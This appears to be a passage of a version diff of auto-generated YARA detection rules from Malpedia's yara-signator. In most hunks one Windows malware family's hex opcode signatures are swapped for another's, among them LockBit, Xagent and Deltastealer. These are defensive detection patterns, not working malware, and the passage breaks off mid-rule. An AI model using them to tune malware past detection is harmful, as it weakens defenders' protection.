-		id = "70e37162-3a73-596a-8d7d-42b9d85b78f7"
+		id = "c873f75a-bac6-59c1-887a-5d663acd72dd"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.starsypound"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.starsypound_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.navrat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.navrat_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "abf4ae91c4287e1227ba24bd55f61dc3c1250c1b8b21f760166157e29806933f"
+		logic_hash = "c07b699c6f0dfc54b32e135d358bdfb08bd5b26e1aa027b1f4dd7fec4dc44720"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -117296,32 +117612,32 @@ rule MALPEDIA_Win_Starsypound_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 8dbc2458010000 83c9ff 33c0 }
-		$sequence_1 = { 68???????? 52 e8???????? 83c420 85c0 7444 8b5304 }
-		$sequence_2 = { 53 56 57 6a18 e8???????? 8bb42424040000 }
-		$sequence_3 = { 8d4c2428 68???????? 51 e8???????? 56 8d542434 }
-		$sequence_4 = { 8bfd 8d44240c f3a5 8b5500 8b3d???????? 6a00 }
-		$sequence_5 = { 885c3438 c744241804010000 ff15???????? 8dbc2458010000 83c9ff 33c0 }
-		$sequence_6 = { 50 8d4c2424 56 51 52 }
-		$sequence_7 = { f3a4 885c0444 bf???????? 83c9ff 33c0 33f6 }
-		$sequence_8 = { 83c40c 85c0 7e2b eb08 }
-		$sequence_9 = { e8???????? 68c0270900 ff15???????? e8???????? 5f }
+		$sequence_0 = { 8d48d0 80f909 7707 0fbec0 83c004 c3 }
+		$sequence_1 = { 85f6 7407 8b7608 83461c02 5f }
+		$sequence_2 = { 56 68???????? 50 8d85f0feffff 8bf1 }
+		$sequence_3 = { 1bf6 f7de 56 68???????? }
+		$sequence_4 = { c745d477617265 c745d85c4d6963 c745dc726f736f c745e066745c57 c745e4696e646f }
+		$sequence_5 = { c647033d 85f6 7407 8b7608 }
+		$sequence_6 = { c745dc726f736f c745e066745c57 c745e4696e646f c745e877735c43 c745ec75727265 c745f06e745665 }
+		$sequence_7 = { 0fbec0 83c004 c3 3c2b 7503 }
+		$sequence_8 = { 83e847 c3 8d48d0 80f909 7707 0fbec0 }
+		$sequence_9 = { 8d48bf 80f919 7707 0fbec0 83e841 c3 }
 
 	condition:
-		7 of them and filesize < 40960
+		7 of them and filesize < 352256
 }
-rule MALPEDIA_Win_Odinaff_Auto : FILE
+rule MALPEDIA_Win_Babar_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "91e538b8-49fb-59bb-b141-8774c9ea7c3a"
+		id = "4c6a7dce-047d-5f59-9e3d-d3334c41d05a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.odinaff"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.odinaff_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.babar"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.babar_auto.yar#L1-L161"
 		license_url = "N/A"
-		logic_hash = "30f018bdaf01e341e417353febba3580b7f1e98a76ca0b650eefbf84ad5901ef"
+		logic_hash = "f26db48f4ddda7baab96557200e3865f1c9bdc6e10a7518d2cd23d9a8273c7f2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -117335,32 +117651,38 @@ rule MALPEDIA_Win_Odinaff_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 ff15???????? 837dfc00 b801000000 7503 8b45e4 }
-		$sequence_1 = { 8b45f8 83c410 85c0 7408 50 6a00 }
-		$sequence_2 = { 8d55f0 52 ff15???????? 85c0 0f84ea000000 8b45ec }
-		$sequence_3 = { c7458044000000 ff15???????? 8b4dfc 53 68???????? 51 ff15???????? }
-		$sequence_4 = { 50 c745e400000000 ff15???????? 8b35???????? 8d7808 57 6a08 }
-		$sequence_5 = { 668910 8b55f4 8d4df0 51 52 6a02 c745f000080000 }
-		$sequence_6 = { 51 52 52 6a20 6a01 52 }
-		$sequence_7 = { 6808020000 56 6a00 8bf8 }
-		$sequence_8 = { 53 52 8945fc 895de0 }
-		$sequence_9 = { 8b1d???????? 50 ffd3 8b4d10 }
+		$sequence_0 = { 3bd6 0f8c7affffff 8bbc24d0000000 ddd9 }
+		$sequence_1 = { 3bd5 7e47 8d0c9500000000 2bd9 83c304 2bd5 }
+		$sequence_2 = { 3bd6 0f82eefeffff 8b742458 03f5 }
+		$sequence_3 = { 3bd6 7503 8d5014 895010 }
+		$sequence_4 = { 3bd6 0f86f9feffff 8b54243c 8b442438 }
+		$sequence_5 = { 3bd6 72d9 33f6 eb08 }
+		$sequence_6 = { 3bd6 721b 57 8bcb }
+		$sequence_7 = { 46 8d44bb08 8d5308 8d0cb7 }
+		$sequence_8 = { a3???????? 33c0 c3 8bc1 8b4c2404 c700???????? }
+		$sequence_9 = { 7708 0fb6c9 83e947 eb28 8ad1 80ea30 80fa09 }
+		$sequence_10 = { ffd6 83c001 50 e8???????? 8b15???????? 83c404 }
+		$sequence_11 = { c744242c00000000 ffd3 83c410 85ff 0f848d010000 e8???????? }
+		$sequence_12 = { ff15???????? 8b1424 52 ff15???????? 33c0 }
+		$sequence_13 = { 8b0d???????? 894f08 8b8c2450010000 8bc7 5f 5e }
+		$sequence_14 = { c1c90b 8bfa 03ce f7d7 0bf9 }
+		$sequence_15 = { e8???????? 8b8c2418010000 83c40c 5f }
 
 	condition:
-		7 of them and filesize < 73728
+		7 of them and filesize < 1294336
 }
-rule MALPEDIA_Win_Unidentified_031_Auto : FILE
+rule MALPEDIA_Win_Wininetloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a72a563f-a4f8-5666-a877-ef8f429f5482"
+		id = "7ea47534-c96c-52ac-bf22-909791f16181"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_031"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_031_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wininetloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.wininetloader_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "433c3a1b1a13dcc2934f251d10014182069dee4462cd06fa5b97124ebfc25ecc"
+		logic_hash = "b330f726e24dbb98ed7560a78537474ae8441347d679ef8681cdcfe81bca90ca"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -117374,32 +117696,32 @@ rule MALPEDIA_Win_Unidentified_031_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7403 50 ffd7 ff36 ffd7 5f 832600 }
-		$sequence_1 = { 8b45ec 0504020000 50 ffd6 6a6b e8???????? 50 }
-		$sequence_2 = { 8bf8 83c410 85ff 0f84b2000000 85db 0f84a6000000 ff742414 }
-		$sequence_3 = { 8b13 83c410 52 68???????? ff15???????? 8bd0 8d4dc4 }
-		$sequence_4 = { 51 6808200000 ff15???????? 8985fcfeffff 8d95fcfeffff 8d45cc 52 }
-		$sequence_5 = { 6805e9e3a9 6a05 8b0401 8b4dcc 50 8b45d0 51 }
-		$sequence_6 = { ff75e0 ff15???????? 59 59 85c0 0f8505010000 ff75e0 }
-		$sequence_7 = { 2bf8 83ff40 0f87a0000000 8b8d74ffffff 8d4701 50 8b8570ffffff }
-		$sequence_8 = { 898dd0fdffff 52 8d8d08ffffff 50 51 899dd8fdffff 899dc8fdffff }
-		$sequence_9 = { 74a3 837dd400 755d ff75d0 8b45cc 8b4de4 ff75d8 }
+		$sequence_0 = { 48895c2408 57 4883ec20 488bda 488d05ccd10400 488901 488d5108 }
+		$sequence_1 = { 8b3b 0f1f00 33c0 4d8bce 85ff 7422 488b4b10 }
+		$sequence_2 = { 48895c2438 488bfa 4889742440 488d5920 33f6 0f1f00 488b13 }
+		$sequence_3 = { 84c0 0f84b5f7ffff 4c8d25b2df0200 498bcc 49391f 741c 0fb711 }
+		$sequence_4 = { 4c897580 48c7458807000000 664489742470 ba68000000 488d4c2470 e8???????? 4c8bd0 }
+		$sequence_5 = { ff15???????? 488b4e18 ba6d230000 ff15???????? 33d2 488bc8 448d4201 }
+		$sequence_6 = { 498b06 b230 498bce 488b4040 ff15???????? 408af8 660f6f05???????? }
+		$sequence_7 = { 660bd0 b800240000 03c2 66413bc5 0f8787000000 0fb7c2 2d00dc0000 }
+		$sequence_8 = { 410f1007 0f29442460 4d85f6 7427 408a7c2420 498bf2 408ad7 }
+		$sequence_9 = { eb03 498bff 4c8bc6 488bd7 eb55 488b3d???????? 4885ff }
 
 	condition:
-		7 of them and filesize < 1998848
+		7 of them and filesize < 2659328
 }
-rule MALPEDIA_Win_Bee_Auto : FILE
+rule MALPEDIA_Win_Targetcompany_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "db73c98e-464c-5a10-86d4-5be67acb42ee"
+		id = "f1b7a89e-2688-52a1-8c7d-13cb0d455b2e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bee"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bee_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.targetcompany"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.targetcompany_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "5ff9293be730d91df0bdf17c2150532b12e666a23f61e90864080eb355a44306"
+		logic_hash = "7d65ff06dda40a31d2e8e57267ae5018fe6d616cb14d7c02506f36589aa887d7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -117413,34 +117735,34 @@ rule MALPEDIA_Win_Bee_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b450c 2bc6 50 03fe 57 8d4c2434 899c2498000000 }
-		$sequence_1 = { e8???????? 68dc050000 ffd6 8b842488000000 39ac249c000000 7307 8d842488000000 }
-		$sequence_2 = { e8???????? 83c404 837e5410 720c 8b4e40 51 e8???????? }
-		$sequence_3 = { c700???????? 894804 894808 83c00c 50 e8???????? }
-		$sequence_4 = { 7d10 668b4c4310 66890c4544504200 40 }
-		$sequence_5 = { 0fb6510c 885004 8b5110 895008 0fb65114 }
-		$sequence_6 = { 50 c744242488130000 ff15???????? 8b1d???????? }
-		$sequence_7 = { 50 57 ffd5 83f8ff 7508 ff15???????? f7d8 }
-		$sequence_8 = { 8d1c8d00534200 8bf8 83e71f c1e706 8b0b 0fbe4c3904 83e101 }
-		$sequence_9 = { 8bf8 eb02 33ff c744242cffffffff 897c2414 85ff }
+		$sequence_0 = { e8???????? 83c424 8d8574ffffff 50 8d85ecdcffff 50 ff15???????? }
+		$sequence_1 = { 75f1 8db57cffffff e8???????? 8bf0 }
+		$sequence_2 = { 8945e4 3d01010000 7d0d 8a4c181c 8888d8e84100 40 ebe9 }
+		$sequence_3 = { c20800 56 8bf0 81fffeffff7f 7605 e8???????? 8b4618 }
+		$sequence_4 = { a5 ff759c 895dd0 53 6a40 ff15???????? 8bf0 }
+		$sequence_5 = { 6a01 68???????? 33db 53 e8???????? 85c0 7c56 }
+		$sequence_6 = { 8d45f8 50 6a1f 53 897de4 8975f8 ff15???????? }
+		$sequence_7 = { 33c5 8945fc 53 56 57 8d9dccf9ffff 8bf9 }
+		$sequence_8 = { 56 57 8945f4 8945f8 3905???????? 7516 8b0d???????? }
+		$sequence_9 = { 25ffff7f00 c1e108 33d2 0bc8 0bda 8bc1 8b4df8 }
 
 	condition:
-		7 of them and filesize < 394240
+		7 of them and filesize < 328704
 }
-rule MALPEDIA_Win_Xagent_Auto : FILE
+rule MALPEDIA_Win_Gratem_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3dbdacb7-861e-58ce-911f-f56ad1729d00"
+		id = "89f0dee2-28c6-5a10-a3ad-288a448f45ac"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xagent"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.xagent_auto.yar#L1-L239"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gratem"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gratem_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "9db965af9a413dbcee60d3c1d7c4b3b1216a3333272ef760fe1fa17d4a9ca01b"
+		logic_hash = "b58ab0ade84c3286830362f0f11bfb9519b8733c76dfe4e9cd7ba24746663e50"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -117452,48 +117774,32 @@ rule MALPEDIA_Win_Xagent_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 8bd8 e8???????? 03d8 }
-		$sequence_1 = { c1ea02 6bd20d b801000000 2bc2 }
-		$sequence_2 = { 57 8b7a08 c1e802 83e103 3bf8 7702 2bc7 }
-		$sequence_3 = { 8b0482 8b0488 8b4e10 85c9 7423 8b7e08 }
-		$sequence_4 = { eb02 8b11 8b4808 8bc1 57 8b7a08 }
-		$sequence_5 = { 894e10 7507 c7460c00000000 5f 5e }
-		$sequence_6 = { 03ff 3b7e0c 7707 c7460c00000000 49 894e10 7507 }
-		$sequence_7 = { 7702 2bc7 8b5204 8b0482 8b0488 8b4e10 }
-		$sequence_8 = { 8b7e08 ff460c 03ff 03ff 3b7e0c 7707 }
-		$sequence_9 = { 8bce e8???????? 8b08 85c9 7504 }
-		$sequence_10 = { 740c 488b07 4c8b13 488903 4c8917 488b13 488b0e }
-		$sequence_11 = { e8???????? 498bce 4e8d0437 482bcf }
-		$sequence_12 = { 384b02 0f92c3 488d4c2430 e8???????? }
-		$sequence_13 = { e8???????? 488b4328 4c8bcf 4c8bc6 }
-		$sequence_14 = { e8???????? 48833b00 740a 488b4308 }
-		$sequence_15 = { 4053 4883ec30 488b4118 488bd9 482b4110 }
-		$sequence_16 = { 8bd8 e8???????? 8d0c18 e8???????? }
-		$sequence_17 = { 84c0 740c 488b07 488b0b 488903 }
-		$sequence_18 = { b803b57ea5 f7e6 c1ea06 6bd263 }
-		$sequence_19 = { baf4010000 488bcb ff15???????? 85c0 }
-		$sequence_20 = { c1ea07 69d295000000 2bca 8bd1 }
-		$sequence_21 = { 75f8 482bc7 488bd6 488d0c38 }
-		$sequence_22 = { 75f8 482bc7 498bd7 488d0c38 }
-		$sequence_23 = { 75f8 482bc7 4d8bc6 488bd3 }
-		$sequence_24 = { 75f8 482bc5 4533e4 488bbc2480000000 4533c9 4c89642430 }
-		$sequence_25 = { 75f8 482bc8 448bc1 488bd0 }
+		$sequence_0 = { c744242404000000 ffd5 85c0 0f84b2000000 }
+		$sequence_1 = { 884e13 66a1???????? 33c9 6685c0 741f 0fb7c0 ba000c0000 }
+		$sequence_2 = { ff15???????? 8b442414 50 ff15???????? 8b5c2410 56 }
+		$sequence_3 = { 85c0 7405 e8???????? 8b8c24d4070000 5e 33cc }
+		$sequence_4 = { 663bc2 0f84ac030000 0fb7048d64bc4000 41 }
+		$sequence_5 = { 8b4c2440 8b542418 894114 895110 }
+		$sequence_6 = { 6a00 50 e8???????? 83c40c 6805010000 8d4c2404 51 }
+		$sequence_7 = { 53 ff54244c 85c0 8b442414 }
+		$sequence_8 = { 0fb7c0 baa8540000 663bc2 0f8420050000 0fb7048d64bc4000 41 }
+		$sequence_9 = { 56 8d34c5c0b84000 833e00 7513 50 e8???????? }
 
 	condition:
-		7 of them and filesize < 729088
+		7 of them and filesize < 155648
 }
-rule MALPEDIA_Win_Unidentified_116_Auto : FILE
+rule MALPEDIA_Win_Ghost_Secret_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "dcbb6fc8-8b09-5285-9468-49ab6b078756"
+		id = "aa96bf29-3993-5fcb-89d9-e0ea92c3a3df"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_116"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_116_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_secret"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ghost_secret_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "cbb333fd9c34e1cf4f6b4bb87d2c0b2963e42381083d5b2c6bc817e5ca64d87b"
+		logic_hash = "c0493088659adfee49574a5acb9764a23e419d0406508dff35abe1e75e13521d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -117507,32 +117813,32 @@ rule MALPEDIA_Win_Unidentified_116_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b7718 48 8bd6 48 8d4615 48 894718 }
-		$sequence_1 = { c70016000000 e8???????? 48 8b03 bf02000000 48 8b08 }
-		$sequence_2 = { 8bf0 48 89442438 48 8bd8 48 89442420 }
-		$sequence_3 = { ba02000000 e8???????? 48 8bcb e8???????? 33c0 48 }
-		$sequence_4 = { 8d052146ffff 48 0f45c1 48 8b4c2440 48 33cc }
-		$sequence_5 = { e8???????? 33c0 48 83c428 c3 49 8bcb }
-		$sequence_6 = { 8bd2 48 8bfa 48 99 49 8bd9 }
-		$sequence_7 = { 8bcb 660f7f742420 49 8bf1 49 8bf8 e8???????? }
-		$sequence_8 = { 8bf2 4c 8bf9 8b2d???????? b9c8000000 e8???????? 48 }
-		$sequence_9 = { ff4808 834a5802 48 8b4218 48 85c0 7405 }
+		$sequence_0 = { c684244a04000036 c684244b040000e2 c684244c04000057 c684244d04000049 c684244e0400002c c684244f040000f6 c684245004000070 }
+		$sequence_1 = { 85c0 59 0f8547010000 837e5816 740a b80088ffff }
+		$sequence_2 = { c684245b040000ec c684245c04000067 c684245d04000052 c684245e04000007 c684245f040000f0 c684246004000070 c684246104000065 }
+		$sequence_3 = { 55 ff15???????? 8b942450020000 52 e8???????? 8b8c2454020000 8be8 }
+		$sequence_4 = { c1e208 0fb69bc4f04100 33d3 33db 8a5df2 3316 0fb69bc4f04100 }
+		$sequence_5 = { ff7648 e8???????? 57 55 ff766c e8???????? }
+		$sequence_6 = { 8bf0 85f6 741f 8d842434040000 6a10 50 }
+		$sequence_7 = { c684244b05000059 c684244c05000013 c684244d050000b9 c684244e050000f3 888c244f050000 c684245005000046 }
+		$sequence_8 = { 331c8dc4d34100 59 331c85c4db4100 8b45f8 23c7 331c85c4cf4100 331e }
+		$sequence_9 = { c644245d25 c644245e60 c644245f55 c6442460d5 c64424615a c644246232 884c2467 }
 
 	condition:
-		7 of them and filesize < 1040384
+		7 of them and filesize < 278528
 }
-rule MALPEDIA_Win_R77_Auto : FILE
+rule MALPEDIA_Win_Deltastealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "82a35666-90fe-5251-926e-d8ec55b813d1"
+		id = "ae1ce1b2-5800-51da-891a-7d0ee714cc8c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.r77"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.r77_auto.yar#L1-L155"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.deltastealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.deltastealer_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "a6240af5ccc4c53bc37ef2e7a551ebc739733179f6b77ecd5d71bb872b7b54ae"
+		logic_hash = "7a995bc7de4a09d620f7c56a219adce0b4fee73dcf5dde633c44a4fcc3f98e63"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -117546,36 +117852,32 @@ rule MALPEDIA_Win_R77_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 740b 8b0f e8???????? 85c0 }
-		$sequence_1 = { 740c 8b4f0c e8???????? 85c0 }
-		$sequence_2 = { 660fc5c400 25f0070000 660f28a050680110 660f28b840640110 660f54f0 660f5cc6 660f59f4 }
-		$sequence_3 = { 488b4b18 e8???????? 85c0 744b 488b5720 488b4b20 e8???????? }
-		$sequence_4 = { 8b0c85f8a00110 8a0413 03ce 8844192e 43 }
-		$sequence_5 = { 4533db 488b05???????? 4885c0 7432 488b5028 418bcb 448b02 }
-		$sequence_6 = { 488bc8 ff15???????? 85c0 740e 395c2440 0f94c3 }
-		$sequence_7 = { ff7650 6a00 ffd0 8bd8 895de8 85db }
-		$sequence_8 = { 837f0800 7414 8b470c ff3498 8b460c ff3498 }
-		$sequence_9 = { 8b45f8 83c030 894508 837d0c00 750b 6a0d e8???????? }
-		$sequence_10 = { 418bc8 418b048b 4139048a 750e 41ffc0 453bc1 72eb }
-		$sequence_11 = { d1e1 8b5508 0fb6040a 83f840 }
-		$sequence_12 = { 7357 498bc8 4c8d1571e80000 83e13f 498bc0 }
-		$sequence_13 = { 488b55c8 4c8d054efd0000 85c0 0f8417010000 }
+		$sequence_0 = { 7317 eb5f 660f6f07 660fd7c0 f7d0 4881c600fdffff 4883c710 }
+		$sequence_1 = { 488d442438 488910 4c8d4c2440 498901 4d897108 488b4e38 488b5650 }
+		$sequence_2 = { 89d5 4889ce 488b09 488b4608 ba27000000 ff5020 40b701 }
+		$sequence_3 = { 5e 415c 415e 415f c3 0fb611 4883fa05 }
+		$sequence_4 = { 4989d8 e8???????? 4801df 4929dd 4939dd 73e6 eb82 }
+		$sequence_5 = { e9???????? 488b442420 48c70002000000 eb33 488b442420 48c70001000000 }
+		$sequence_6 = { 488d42f0 482301 4c8b4118 45880c10 46884c0010 48ff4110 c3 }
+		$sequence_7 = { 4181fe00001100 b903000000 0f43c8 bb01001100 ba5c000000 488d05c7020000 48630c88 }
+		$sequence_8 = { 48c1ef39 488d43f0 4821c5 41883c1e 42887c3510 eb25 }
+		$sequence_9 = { 4885c0 748a 8a1406 8a1c01 881c06 881401 48ffc0 }
 
 	condition:
-		7 of them and filesize < 350208
+		7 of them and filesize < 3532800
 }
-rule MALPEDIA_Win_Felismus_Auto : FILE
+rule MALPEDIA_Win_Lockbit_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "82db284d-423c-5d27-9839-6fb28439fb0e"
+		id = "6f3385a8-2122-56da-ae67-c32b266b8bf0"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.felismus"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.felismus_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lockbit"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lockbit_auto.yar#L1-L209"
 		license_url = "N/A"
-		logic_hash = "4546b8db4538dafe5bc8d041a61c766239a1afc6f98e209750b1eab9012fff52"
+		logic_hash = "f9cfb53a3d4bcd6fa0ccd32df2c087610c559fdf32ede817bcfaa297f48ef893"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -117589,32 +117891,42 @@ rule MALPEDIA_Win_Felismus_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 55 8b2d???????? ffd5 8bbc24000a0000 b908000000 8d742420 53 }
-		$sequence_1 = { 51 8bcd e8???????? eb2e 83f803 7519 }
-		$sequence_2 = { 8bf0 e8???????? 83c418 8945e0 56 68???????? 50 }
-		$sequence_3 = { e9???????? 8b442410 5f c6450000 5e 5d 5b }
-		$sequence_4 = { 5b 81c4b4010000 c3 55 ffd3 8b4c2414 }
-		$sequence_5 = { 8a840620420110 884201 33c0 8a4102 }
-		$sequence_6 = { d3ee 8b0d???????? d3e7 8b4c2474 0bf7 8b7834 03f1 }
-		$sequence_7 = { 83c404 57 ff15???????? 8b5dec e9???????? b911000000 33c0 }
-		$sequence_8 = { 83c40c f2ae f7d1 2bf9 8d95f4fdffff 8bf7 8bfa }
-		$sequence_9 = { 33ff 85db 7e7f ff15???????? 99 b91a000000 }
+		$sequence_0 = { 49 8bc1 5f 59 5d }
+		$sequence_1 = { c20800 33c0 40 c1e006 }
+		$sequence_2 = { 4f 85ff 75c1 5f }
+		$sequence_3 = { 8d45f8 50 8d45fc 50 ff75fc ff75f4 }
+		$sequence_4 = { 03d0 90 85c0 75e1 8bc2 5e 5a }
+		$sequence_5 = { 33c0 8d7df0 33c9 53 0fa2 8bf3 5b }
+		$sequence_6 = { 8b7508 b961000000 66ad 90 6683f841 720b 6683f85a }
+		$sequence_7 = { 83ec10 53 56 57 33c0 8d7df0 33c9 }
+		$sequence_8 = { f745f800000002 740c 5f 5e b801000000 5b }
+		$sequence_9 = { 33d0 8bc1 c1e810 0fb6c0 c1e208 }
+		$sequence_10 = { 720b 6683f85a 7705 6683c820 90 02f1 }
+		$sequence_11 = { 2d04040404 49 75f4 8b7d0c be40000000 33db 55 }
+		$sequence_12 = { 8d8550fdffff 50 6a00 ff15???????? }
+		$sequence_13 = { 8bf3 5b 8907 897704 894f08 89570c f745f800000002 }
+		$sequence_14 = { 8d45f4 50 6a00 6a00 ff15???????? }
+		$sequence_15 = { e8???????? 85c0 7502 eb59 8d3c47 6a00 }
+		$sequence_16 = { 0f28c8 660f73f904 660fefc8 0f28c1 660f73f804 660fefc1 }
+		$sequence_17 = { 6a00 6a00 6800000040 ff75d4 }
+		$sequence_18 = { 7413 83e910 660f6f0c0e 660f3a0fc10f 660f7f040f }
+		$sequence_19 = { 234df0 094ddc 0155dc 8b55f4 8bf2 c1ce0b 8bca }
 
 	condition:
-		7 of them and filesize < 204800
+		7 of them and filesize < 2049024
 }
-rule MALPEDIA_Win_Spider_Rat_Auto : FILE
+rule MALPEDIA_Win_Slickshoes_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a31996a5-e3ca-592f-95bc-8fa380f84c48"
+		id = "d2f3560b-3237-526b-973c-5a49467a861c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spider_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.spider_rat_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.slickshoes"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.slickshoes_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "a5e11d471849c9a1ee46ff091a234f4718c14598ff1efe77b39f8fba97b05619"
+		logic_hash = "97b262a4dee8ee1b76d2a0a337ee7fc4558fd80e3330d7f7994e897a96aa6369"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -117628,34 +117940,34 @@ rule MALPEDIA_Win_Spider_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4c8d0513ca0600 83e21f 486bd258 490314c8 488d0d414b0600 eb11 488d0d384b0600 }
-		$sequence_1 = { 48898424d0000000 488bc2 488bf9 488364242800 488d2d2bc80100 48896c2420 }
-		$sequence_2 = { 488d8c2480000000 e8???????? 90 4c8d842448010000 488bd0 488d8c24d0000000 e8???????? }
-		$sequence_3 = { 0fbe1401 488d1c01 488d0db7b30500 4d8bc1 e8???????? 4885c0 752e }
-		$sequence_4 = { 8bd7 e8???????? 90 4889442450 488d15d3c50200 488d4c2450 }
-		$sequence_5 = { 488b8b48020000 4c8d8c24d0040000 488d9424d0000000 4183c8ff 896c2420 ff15???????? 85c0 }
-		$sequence_6 = { 4885db 74f1 488b02 488364243800 4c8d442438 488d154f380200 498bc9 }
